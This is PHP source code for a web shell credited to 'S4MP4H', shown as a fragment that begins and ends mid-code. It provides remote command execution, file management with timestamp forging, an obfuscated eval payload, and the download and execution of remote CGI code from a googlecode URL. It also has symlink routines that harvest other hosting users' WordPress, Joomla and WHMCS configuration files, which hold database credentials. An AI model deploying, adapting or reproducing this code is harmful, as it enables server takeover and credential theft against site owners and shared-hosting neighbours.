Allright Reserved ".date('Y',time())." © S4MP4H"); } $hijau=array("#00FF00","#006400","#003200"); $merah=array("#FF0000","#640000","#320000"); $biru=array("#0000FF","#000064","#000032"); $kuning=array("#FFFF00","#646400","#323200"); $cyan=array("#00FFFF","#006464","#003232"); $pink=array("#FF00FF","#640064","#320032"); $theme="hijau"; $ya=""; $tak=""; $scroll="tak"; if(isset($_COOKIE['theme'])) $theme=$_COOKIE['theme']; if(isset($_COOKIE['scroll'])) $scroll=$_COOKIE['scroll']; switch($_GET['x']) { case 'green': if(isset($_COOKIE['theme'])) $theme=$_COOKIE['theme']; $theme="hijau"; setcookie("theme",$theme,time()+$login_time); break; case 'red': if(isset($_COOKIE['theme'])) $theme=$_COOKIE['theme']; $theme="merah"; setcookie("theme",$theme,time()+$login_time); break; case 'blue': if(isset($_COOKIE['theme'])) $theme=$_COOKIE['theme']; $theme="biru"; setcookie("theme",$theme,time()+$login_time); break; case 'yellow': if(isset($_COOKIE['theme'])) $theme=$_COOKIE['theme']; $theme="kuning"; setcookie("theme",$theme,time()+$login_time); break; case 'cyan': if(isset($_COOKIE['theme'])) $theme=$_COOKIE['theme']; $theme="cyan"; setcookie("theme",$theme,time()+$login_time); break; case 'pink': if(isset($_COOKIE['theme'])) $theme=$_COOKIE['theme']; $theme="pink"; setcookie("theme",$theme,time()+$login_time); break; case 'scroll': if(isset($_COOKIE['scroll'])) $scroll=$_COOKIE['scroll']; $scroll="yes"; setcookie("scroll",$scroll,time()+$login_time); break; case 'normal': if(isset($_COOKIE['scroll'])) $scroll=$_COOKIE['scroll']; $scroll="no"; setcookie("scroll",$scroll,time()+$login_time); break; } if($theme=="hijau") { $color=$hijau; } elseif($theme=="merah") { $color=$merah; } elseif($theme=="biru") { $color=$biru; } elseif($theme=="kuning") { $color=$kuning; } elseif($theme=="cyan") { $color=$cyan; } else { $color=$pink; } if($scroll=="yes") { $jsc=$ya; } else { $jsc=$tak; } if(isset($_GET['dl'])&&($_GET['dl']!="")) { $file=$_GET['dl']; $filez=@file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file)."\";"); echo $filez; exit; } if(isset($_GET['img'])) { @ob_clean(); $d=magicboom($_GET['y']); $f=$_GET['img']; $inf=@getimagesize($d.$f); $ext=explode($f,"."); $ext=$ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } elseif(isset($_GET['dlgzip'])&&($_GET['dlgzip']!="")) { $file=$_GET['dlgzip']; $filez=gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file).".gz\";"); echo $filez; exit; } $SESSION='==jO0KPlTw0PjGAHQFIWFNt/1CO5GG7TBIrvzz2uJTbGX3ODgIFUzLVkNJd1fL+o9tRGnL8DUnGBjus0V5+a6Eq3Hyi5eLYh17fAd2lbLilgugfmGNLvX71HDcbsGxh+mCEH3aIYTMWprN+TPBtW2FWAOjjSm8FG7ccFwmRVftLuUsM5Ra0oOtqDDT3dEZTEWu4CquZlkuPIu7OXwq7rYP24k3FA4EuCokKdiUUMsjQ6WTc43RgbR1/yslnXs1SUS8SbhJ8yORzs6hJgyz3YxfziqXyGG1vZWfnDHU8ehH9S9wMHwXPuhEnGkNwI4mr9DhjCwJS5tBP6q/SC2Op33iqIghjSurJtcV6pVb64ZTXCt8ChkVbJOMsF/GJLB9+r929k32qYXIl993L1620VIEo2wTuFU3ybIEaqgpQJFO9+0BnfPMnDV8U2+jCSjZ4nuOIK'; $software=getenv("SERVER_SOFTWARE"); if(@ini_get("safe_mode")orstrtolower(@ini_get("safe_mode"))=="on") $safemode=TRUE; else $safemode=FALSE; $system=@php_uname(); function showstat($stat) { if($stat=="on") { return "ON"; } else { return "OFF"; } } function testmysql() { if(function_exists('mysql_connect')) { return showstat("on"); } else { return showstat("off"); } } function testcurl() { if(function_exists('curl_version')) { return showstat("on"); } else { return showstat("off"); } } function testpostgresql() { if(function_exists('pg_connect')) { return showstat("on"); } else { return showstat("off"); } } function testwget() { if(exe('wget --help')) { return showstat("on"); } else { return showstat("off"); } } function testperl() { if(exe('perl -h')) { return showstat("on"); } else { return showstat("off"); } } function testoracle() { if(function_exists('ocilogon')) { return showstat("on"); } else { return showstat("off"); } } function testmssql() { if(function_exists('mssql_connect')) { return showstat("on"); } else { return showstat("off"); } } function showdisablefunctions() { if($disablefunc=@ini_get("disable_functions")) { return "".$disablefunc.""; } else { return "NONE"; } } preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x73\x74\x72\x5F\x72\x6F\x74\x31\x33\x28\x73\x74\x72\x72\x65\x76\x28\x24\x53\x45\x53\x53\x49\x4F\x4E\x29\x29\x29\x29\x29\x3B","."); if(strtolower(substr($system,0,3))=="win") $win=TRUE; else $win=FALSE; if(isset($_GET['y'])) { if(@is_dir($_GET['view'])) { $pwd=$_GET['view']; @chdir($pwd); } else { $pwd=$_GET['y']; @chdir($pwd); } } $alamat=str_replace($_SERVER['DOCUMENT_ROOT'],"",@getcwd()); $dir=$_POST['file']; function delTree($dir) { $files=array_diff(scandir($dir),array('.','..')); foreach($files as $file) {(is_dir("$dir/$file"))?delTree("$dir/$file"):unlink("$dir/$file"); } return rmdir($dir); } function S4MP4H_Crypt($plain) { return sha1(md5($plain)); } function changepass($plain) { $newpass=S4MP4H_Crypt($plain); $newpass="\$xPass = \"".$newpass."\";"; $con=file_get_contents($_SERVER['SCRIPT_FILENAME']); $con=preg_replace("/\\\$xPass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$newpass,$con); return file_put_contents($_SERVER['SCRIPT_FILENAME'],$con); } function changetoken($plains) { $newtoken=base64_encode($plains); $newtoken="\$xToken = \"".$newtoken."\";"; $cons=file_get_contents($_SERVER['SCRIPT_FILENAME']); $cons=preg_replace("/\\\$xToken\ *=\ *[\"\']*([a-zA-Z0-9\/+=]*)[\"\']*;/is",$newtoken,$cons); return file_put_contents($_SERVER['SCRIPT_FILENAME'],$cons); } function convertByte($s) { if($s>=1073741824) return sprintf('%1.2f',$s/1073741824).' GB'; elseif($s>=1048576) return sprintf('%1.2f',$s/1048576).' MB'; elseif($s>=1024) return sprintf('%1.2f',$s/1024).' KB'; else return $s.' B'; } $free=convertByte(disk_free_space("/")); $total=convertByte(disk_total_space("/")); $free_percent=round(100/($total/$free),2)."%"; function view_size($size) { if(!is_numeric($size)) { return FALSE; } else { if($size>=1073741824) { $size=round($size/1073741824*100)/100." GB"; } elseif($size>=1048576) { $size=round($size/1048576*100)/100." MB"; } elseif($size>=1024) { $size=round($size/1024*100)/100." KB"; } else { $size=$size." B"; } return $size; } } function disp_freespace($s) { $free=@disk_free_space($s); $total=@disk_total_space($s); if($free===FALSE) { $free=0; } if($total===FALSE) { $total=0; } if($free<0) { $free=0; } if($total<0) { $total=0; } $used=$total-$free; $free_percent=round(100/($total/$free),2)."%"; $free=view_size($free); $total=view_size($total); return "$free of $total ($free_percent)"; } if(!$win) { if(!$user=rapih(exe("whoami"))) $user=""; if(!$id=rapih(exe("id"))) $id=""; $prompt=$user." \$ "; $pwd=@getcwd().DIRECTORY_SEPARATOR; } else { $user=@get_current_user(); $id=$user; $prompt=$user." $"; $pwd=realpath(".")."\\"; $v=explode("\\",$d); $v=$v[0]; foreach(range("A","Z") as $letter) { $bool=@is_dir($letter.":\\"); if($bool) { $letters.="[ "; if($letter.":"!=$v) { $letters.=$letter; } else { $letters.="".$letter.""; } $letters.=" ] "; } } } if(function_exists("posix_getpwuid")&&function_exists("posix_getgrgid")) $posix=TRUE; else $posix=FALSE; $server_ip=@gethostbyname($_SERVER['HTTP_HOST']); $my_ip=$_SERVER['REMOTE_ADDR']; $local_ip=$_SERVER['HTTP_X_FORWARDED_FOR']; if(empty($local_ip)) $local_ip="Unknown"; $via=explode(" ",$_SERVER['HTTP_VIA']); $via_ip=$via[1]; $bindport="13123"; $bindport_pass="syntax"; $pwds=explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl=""; for($i=0;$i".$pwds[$i]." ".DIRECTORY_SEPARATOR." "; } if(isset($_POST['rename'])) { $old=$_POST['oldname']; $new=$_POST['newname']; @rename($pwd.$old,$pwd.$new); $file=$pwd.$new; } if(isset($_POST['copy'])) { $oldf=$_POST['oldfile']; $newf=$_POST['newfile']; @copy($oldf,$newf); $file=$newf; } if(isset($_POST['move'])) { $oldm=$_POST['oldmove']; $newm=$_POST['newmove']; @rename($oldm,$newm); $file=$newm; } function recurse_copy($src,$dst) { $dir=opendir($src); @mkdir($dst); while(false!==($file=readdir($dir))) { if(($file!='.')&&($file!='..')) { if(is_dir($src.'/'.$file)) { recurse_copy($src.'/'.$file,$dst.'/'.$file); } else { copy($src.'/'.$file,$dst.'/'.$file); } } } closedir($dir); } if(isset($_POST['copydir'])) { $src=$_POST['olddir']; $dst=$_POST['newdir']; recurse_copy($src,$dst); } if(isset($_POST['movedir'])) { $srcd=$_POST['olddirz']; $dstd=$_POST['newdirz']; @rename($srcd,$dstd); $folder=$dstd; } if(isset($_POST['chmod'])) { $name=$_POST['name']; $value=$_POST['newvalue']; if(strlen($value)==3) { $value=0."".$value; } @chmod($pwd.$name,octdec($value)); $file=$pwd.$name; } if(isset($_POST['chmod_folder'])) { $name=$_POST['name']; $value=$_POST['newvalue']; if(strlen($value)==3) { $value=0."".$value; } @chmod($pwd.$name,octdec($value)); $file=$pwd.$name; } if(isset($_POST['touch'])) { $time=strtotime($_POST['newtime']); $oldz=$_POST['oldtime']; @touch($oldz,$time,$time); clearstatcache(); } if(isset($_POST['touch_folder'])) { $time=strtotime($_POST['newtime']); $oldz=$_POST['oldtime']; @touch($oldz,$time,$time); clearstatcache(); } function S4MP4H_setcookie($k,$v) { $_COOKIE[$k]=$v; setcookie($k,$v); } if(!empty($_COOKIE['file'])) $_COOKIE['file']=@unserialize($_COOKIE['file']); if(!empty($_POST['selectedValue'])) { switch($_POST['selectedValue']) { case 'paste': if($_COOKIE['z']=='copy') { function copy_paste($c,$s,$d) { if(is_dir($c.$s)) { mkdir($d.$s); $h=@opendir($c.$s); while(($f=@readdir($h))!==false) if(($f!=".")and($f!="..")) copy_paste($c.$s.'/',$f,$d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s,$d.$s); } foreach($_COOKIE['file'] as $f) copy_paste($_COOKIE['pwd'],$f,$pwd); } elseif($_COOKIE['z']=='move') { function move_paste($c,$s,$d) { if(is_dir($c.$s)) { mkdir($d.$s); $h=@opendir($c.$s); while(($f=@readdir($h))!==false) if(($f!=".")and($f!="..")) copy_paste($c.$s.'/',$f,$d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s,$d.$s); } foreach($_COOKIE['file'] as $f) @rename($_COOKIE['pwd'].$f,$pwd.$f); } elseif($_COOKIE['z']=='zip') { if(class_exists('ZipArchive')) { $zip=new ZipArchive(); if($zip->open($_POST['nm'],1)) { chdir($_COOKIE['pwd']); foreach($_COOKIE['file'] as $f) { if($f=='..') continue; if(@is_file($_COOKIE['pwd'].$f)) $zip->addFile($_COOKIE['pwd'].$f,$f); elseif(@is_dir($_COOKIE['pwd'].$f)) { $iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/',FilesystemIterator::SKIP_DOTS)); foreach($iterator as $key=>$value) { $zip->addFile(realpath($key),$key); } } } chdir($GLOBALS['pwd']); $zip->close(); } } } elseif($_COOKIE['z']=='unzip') { if(class_exists('ZipArchive')) { $zip=new ZipArchive(); foreach($_COOKIE['file'] as $f) { if($zip->open($_COOKIE['pwd'].$f)) { $zip->extractTo($GLOBALS['pwd']); $zip->close(); } } } } unset($_COOKIE['file']); setcookie('file','',time()-3600); break; case 'del': foreach($_POST['file'] as $file) { if(isset($file)) { if(unlink($file)) { echo ""; } elseif(is_dir($file)) { delTree($file); echo ""; } else { echo ""; } } } break; default: if(!empty($_POST['selectedValue'])) { S4MP4H_setcookie('z',$_POST['selectedValue']); S4MP4H_setcookie('file',serialize(@$_POST['file'])); S4MP4H_setcookie('pwd',@$_POST['pwd']); } break; } } $admin_id=$_SERVER['SERVER_ADMIN']; $is_writable=is_writable($GLOBALS['pwd'])?"YES":" NO"; $buff="Software : ".$software." PHP/".phpversion()."
"; $buff.="System : ".$system."
"; if($id!="") $buff.="ID : ".$id."
"; $buff.="Server IP : ".$server_ip." | Your Public IP : ".$my_ip." | Your Local IP : ".$local_ip."
"; $buff.="Free Disk : "."".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))." (".$free_percent.") | Writable : ".$is_writable."
"; if($safemode) $buff.="Safemode : ON"; else $buff.="Safemode : OFF"; $buff.=" | Disabled Functions : ".showdisablefunctions()."
"; $buff.="MySQL : ".testmysql()." | MSSQL : ".testmssql()." | PostgreSQL : ".testpostgresql()." | Oracle : ".testoracle()." | Perl : ".testperl()." | Curl : ".testcurl()." | WGet : ".testwget()."
"; $buff.="".$letters." [ Home ] > ".$pwdurl.""; function rapih($text) { return trim(str_replace("
","",$text)); } function magicboom($text) { if(!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } $s_sortable_js=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/sortable.js'); echo ""; function showdir($pwd,$prompt) { $fname=array(); $dname=array(); $total_file=$total_dir=0; if(function_exists("posix_getpwuid")&&function_exists("posix_getgrgid")) $posix=TRUE; else $posix=FALSE; $user="????:????"; if($dh=@scandir($pwd)) { foreach($dh as $file) { if(is_dir($file)) { $dname[]=$file; } elseif(is_file($file)) { $fname[]=$file; } } } else { if($dh=@opendir($pwd)) { while($file=@readdir($dh)) { if(@is_dir($file)) { $dname[]=$file; } elseif(@is_file($file)) { $fname[]=$file; } } @closedir($dh); } } sort($fname); sort($dname); $path=@explode(DIRECTORY_SEPARATOR,$pwd); $tree=@sizeof($path); $parent=""; $buff="
"; ?> 2) for($i=0; $i<$tree-2;$i++) $parent.=$path[$i].DIRECTORY_SEPARATOR; else $parent=$pwd; foreach($dname as $folder) { if($folder==".") { if(!$win&&$posix) { $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner=$name['name']." : ".$group['name']; } else { $owner=$user; } $is_writable=is_writable($pwd)?"YES":"NO"; $buff.=" "; } elseif($folder=="..") { if(!$win&&$posix) { $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner=$name['name']." : ".$group['name']; } else { $owner=$user; } $is_writable=is_writable($parent)?"YES":"NO"; $buff.=""; } else { if(!$win&&$posix) { $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner=$name['name']." : ".$group['name']; } else { $owner=$user; } $is_writable=is_writable($folder)?"YES":"NO"; $buff.=""; $total_dir++; } } foreach($fname as $file) { $full=$pwd.$file; if(!$win&&$posix) { $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner=$name['name']." : ".$group['name']; } else { $owner=$user; } $is_writable=is_writable($file)?"YES":"NO"; $buff.=""; $total_file++; } $buff.="
"; if(!empty($_COOKIE['z'])&&@count($_COOKIE['file'])&&(($_COOKIE['z']=='zip'))) { $buff.=""; } else { $buff.=""; } $buff.="
"; $buff.=" "; return $buff; } function ukuran($file) { if($size=@filesize($file)) { if($size<=1024) return "$size b  "; else { if($size<=1024*1024) { $size=@round($size/1024,2);; return "$size kb  "; } else { $size=@round($size/1024/1024,2); return "$size mb  "; } } } else return "
???
"; } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff=@ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff=""; foreach($results as $result) { $buff.=$result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff=@ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff=@shell_exec($cmd); return $buff; } } function tulis($file,$text) { $textz=gzinflate(base64_decode($text)); if($filez=@fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp=@fopen($link,"r")) { while(!feof($fp)) { $cont.=@fread($fp,1024); } @fclose($fp); $fp2=@fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr) { $path=exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url) { $namafile=basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile); break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile); break; case 'wfread': ambil($wurl,$namafile); break; case 'wfetch': exe(which('fetch')." -o ".$namafile." -p ".$url); break; case 'wlinks': exe(which('links')." -source ".$url." > ".$namafile); break; case 'wget': exe(which('GET')." ".$url." > ".$namafile); break; case 'wcurl': exe(which('curl')." ".$url." -o ".$namafile); break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)) { $perms=''; $perms.=($mode&00400)?'r':'-'; $perms.=($mode&00200)?'w':'-'; $perms.=($mode&00100)?'x':'-'; $perms.=($mode&00040)?'r':'-'; $perms.=($mode&00020)?'w':'-'; $perms.=($mode&00010)?'x':'-'; $perms.=($mode&00004)?'r':'-'; $perms.=($mode&00002)?'w':'-'; $perms.=($mode&00001)?'x':'-'; return $perms; } else return "??????????"; } function clearspace($text) { return str_replace(" ","_",$text); } ?> Shell By <? echo $xName;?>
[ Shell By ]
[Name] :
"; ?> alert('Rename shell from ".$oldx." to ".$newx." successfull'); location.href = '".$newx."'; "; } ?>


Change Token
Old token
New token
Confirm token
"; if(isset($_POST['submitnewtoken'])) { $newtoken=isset($_POST['newtoken'])?trim($_POST['newtoken']):""; $newtokenx=isset($_POST['newtokenx'])?trim($_POST['newtokenx']):""; if(empty($newtoken)||empty($newtokenx)) { echo "Give your new token to both fields"; } elseif($newtoken!=$newtokenx) { echo "Token does not match"; } else { if(changetoken($newtoken)) { echo "Token changed"; } else echo "Unable to change token"; } } echo "
"; } elseif(isset($_GET['x'])&&($_GET['x']=='pass')) { echo "
Change Password
Old password
New password
Confirm password
"; if(isset($_POST['submitnewpass'])) { $newpass=isset($_POST['newpass'])?trim($_POST['newpass']):""; $newpassx=isset($_POST['newpassx'])?trim($_POST['newpassx']):""; if(empty($newpass)||empty($newpassx)) { echo "Give your new password to both fields"; } elseif($newpass!=$newpassx) { echo "Password does not match"; } else { if(changepass($newpass)) { $_SESSION[pass]=$newpass; echo "Password changed"; } else echo "Unable to change password"; } } echo "
"; } elseif(isset($_GET['x'])&&($_GET['x']=='phpinfo')) { @ini_set('output_buffering',0); @ob_start(); @eval("phpinfo();"); $buff=@ob_get_contents(); @ob_end_clean(); $awal=strpos($buff,"")+6; $akhir=strpos($buff,""); echo "
".substr($buff,$awal,$akhir-$awal)."
 
"; } elseif(isset($_GET['x'])&&($_GET['x']=='domain')) { ?>
"; $file=@implode(@file("/etc/named.conf")); if(!$file) { die("[Domain] : Can't Read -> [ /etc/named.conf ]

[ Shell By ".$xName." ]
Allright Reserved © ".date("Y",time())." ".$xName."
"); } preg_match_all("#named/(.*?).db#",$file,$r); $domains=array_unique($r[1]); { $total=0; $no=1; echo ""; foreach($domains as $domain) { $user=posix_getpwuid(@fileowner("/etc/valiases/".$domain)); echo ""; $total++; } echo "
NoUsersDomainsOpen
".$no++."".$user['name']."".$domain."Open
TotalsFounded ".$total." Domains
"; } echo "
"; } elseif(isset($_GET['x'])&&($_GET['x']=='scan')) { echo "
"; if(isset($_POST['Submit'])) { $ceks=array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file'); foreach($ceks as $ceker) { if($_POST[$ceker]<>"") { $six.=$_POST[$ceker]."."; } } $cek=explode('.',$six); function ListFiles($dir) { if($dh=opendir($dir)) { $files=Array(); $inner_files=Array(); while($file=readdir($dh)) { if($file!="."&&$file!="..") { if(is_dir($dir."/".$file)) { $inner_files=ListFiles($dir."/".$file); if(is_array($inner_files)) $files=array_merge($files,$inner_files); } else { array_push($files,$dir."/".$file); } } } closedir($dh); return $files; } } ?>
[Scan] : Successfull

$file) { $nFile=substr($file,-4,4); if($nFile==".php") { if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']) { } else { $ops=@file_get_contents($file); $op=strtolower($ops); $arr=array('c99'=>'c99','r57'=>'r57','s4mp4h'=>'s4mp4h','wso'=>'wso'); $sis=0; if($op) $size=filesize($file); $last_modified=filemtime($file); $last=date("Y-m-d H:i:s",$last_modified); $filn=basename($file); $is_writable=is_writable($file)?"YES":"NO"; foreach($arr as $key=>$val) { if(@preg_match("/$key/",$op)) { $sis="1"; $i++; ?> "1") { if((@preg_match("/system\((.*?)\)/",$op))&&(@preg_match("/
/",$op))&&(@preg_match("/empty\((.*?)\)/",$op))) {
              $sis="2";
              $i++;
              $val="hidden shell";
              ?>
"") { if(@preg_match("/$bugs\((.*?)\)/",$op)) { $i++; ?> "") { $text=$_POST['textV']; if(@preg_match("/$text/",$op)) { $i++; ?> "") { $x++; ?>
No Scan Type File Location Chmod Perms Writable Modified File Size Actions
byte edit | ren | del | down
byte edit | ren | del | down
byte edit | ren | del | down
byte edit | ren | del | down
!!!! ????????? ??? not exist no record -    byte - | - | - | -
Founded Files Scanned
Select Scan Type
 

[Config] : Get With Path
"; if(isset($_POST['pathconfig'])) { echo '


[Name] :
'; } if(isset($_POST['pathconfigstart'])) { $nc=$_POST['foldername']; $dir=mkdir($nc,0755); $r=" Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $f=fopen($nc.'/.htaccess','w'); fwrite($f,$r); $consym="DONE"; echo "[ $consym ]"; $usrs=explode("\n",$_POST['user']); $configuration=array("wp-config.php","wp/wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","home/wp-config.php","main/wp-config.php","site/wp-config.php","web/wp-config.php","joomla/configuration.php","blog/configuration.php","home/configuration.php","main/configuration.php","site/configuration.php","web/configuration.php","vb/includes/config.php","includes/config.php","includes/koneksi.php","config/koneksi.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","lib/config.php","includes/configure.php","forum/includes/config.php"); foreach($usrs as $us) { $usr=explode(":",$us); $usz=$usr['5']; $usx=$usr['0']; foreach($configuration as $c) { $rs=$usz."/".$c; $r=$nc."/".$usx." .. ".$c; symlink($rs,$r); } } } } elseif(isset($_GET['x'])&&($_GET['x']=='configss')) { ?>

[Config] : Get With Manual
"; if(isset($_POST['symlinks'])) { echo '
Manual Symlink
File Path         :
Symlink Name :
'; } $filenya=$_POST['filenya']; $symfile=$_POST['symfile']; if(isset($_POST['symlinkz'])) { mkdir('sym',0755); chdir('sym'); $rt="Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $fo=fopen('.htaccess','w'); fwrite($fo,$rt); symlink($filenya,$symfile); echo '
[ DONE ]
'; } } elseif(isset($_GET['x'])&&($_GET['x']=='configs')) { ?>

[Config] : Get With Perl
"; $dn=$_POST['dirname']; if(isset($_POST['perlconfig'])) { echo '
[Name] :
'; } if(isset($_POST['perlconfigstart'])) { mkdir($dn,0755); chdir($dn); $kokdosya=".htaccess"; $dosya_adi="$kokdosya"; $dosya=fopen($dosya_adi,'w')ordie("Error"); $metin="Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .bin AddHandler cgi-script .bin AddHandler cgi-script .bin"; fwrite($dosya,$metin); fclose($dosya); $configshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/config.cgi'); $file=fopen("config.bin","w+"); $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($configshell))))); fclose($file); chmod("config.bin",0755); $alamat=str_replace($_SERVER['DOCUMENT_ROOT'],"",@getcwd()); echo "[ DONE ]

"; } } elseif(isset($_GET['x'])&&($_GET['x']=='config')) { ?>

[Config] : Get With PHP
"; if(isset($_POST['phpconfig'])) { echo '


[Name] :
'; } if(isset($_POST['phpconfigstart'])) { $nc=$_POST['foldername']; $dir=mkdir($nc,0755); $r=" Options all \n DirectoryIndex syntax.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $f=fopen($nc.'/.htaccess','w'); fwrite($f,$r); $consym="DONE"; echo "[ $consym ]"; $usrs=explode("\n",$_POST['user']); $configuration=array("wp-config.php","wp/wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","home/wp-config.php","main/wp-config.php","site/wp-config.php","web/wp-config.php","joomla/configuration.php","blog/configuration.php","home/configuration.php","main/configuration.php","site/configuration.php","web/configuration.php","vb/includes/config.php","includes/config.php","includes/koneksi.php","config/koneksi.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php","lib/config.php","includes/configure.php","forum/includes/config.php"); foreach($usrs as $us) { $usr=explode(":",$us); $usr[0]."\n"; foreach($usr as $uss) { $us=trim($uss); foreach($configuration as $c) { $rs="/home/".$us."/public_html/".$c; $r=$nc."/".$us." .. ".$c; symlink($rs,$r); } } } } } elseif(isset($_GET['x'])&&($_GET['x']=='cms')) { echo "
"; $base_url='http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']); @mkdir('tmp',0777); @symlink("/","tmp/root"); $htaccss="Options all DirectoryIndex syntax.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any"; file_put_contents("tmp/.htaccess",$htaccss); if(is_readable("/var/named")) { $list=scandir("/var/named"); $current_dir=posix_getcwd(); $dir=explode("/",$current_dir); foreach($list as $domain) { if(strpos($domain,".db")) { $domain=str_replace('.db','',$domain); $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain)); error_reporting(0); $current_dir=posix_getcwd(); $dir=explode("/",$current_dir); symlink($owner['dir'].'/'.$dir[3].'/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/blog/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/home/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/main/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/new/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/portal/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/site/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/web/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/wp/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/wordpress/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/v1/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/v2/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/v3/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/v4/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/v5/wp-config.php',"tmp/".$owner['name'].'-WordPress.txt'); symlink($owner['dir'].'/'.$dir[3].'/config/koneksi.php',"tmp/".$owner['name'].'-Lokomedia.txt'); symlink($owner['dir'].'/'.$dir[3].'/konfigurasi/koneksi.php',"tmp/".$owner['name'].'-Formulasi.txt'); symlink($owner['dir'].'/'.$dir[3].'/lib/config.php',"tmp/".$owner['name'].'-Balitbang.txt'); symlink($owner['dir'].'/'.$dir[3].'/config.php',"tmp/".$owner['name'].'-PhpBB.txt'); symlink($owner['dir'].'/'.$dir[3].'/includes/config.php',"tmp/".$owner['name'].'-vBulletin.txt'); symlink($owner['dir'].'/'.$dir[3].'/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/blog/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/home/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/joomla/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); symlink($owner['dir'].'/'.$dir[3].'/main/configuration.php',"tmp/".$owner['name'].'-Joomla.txt'); 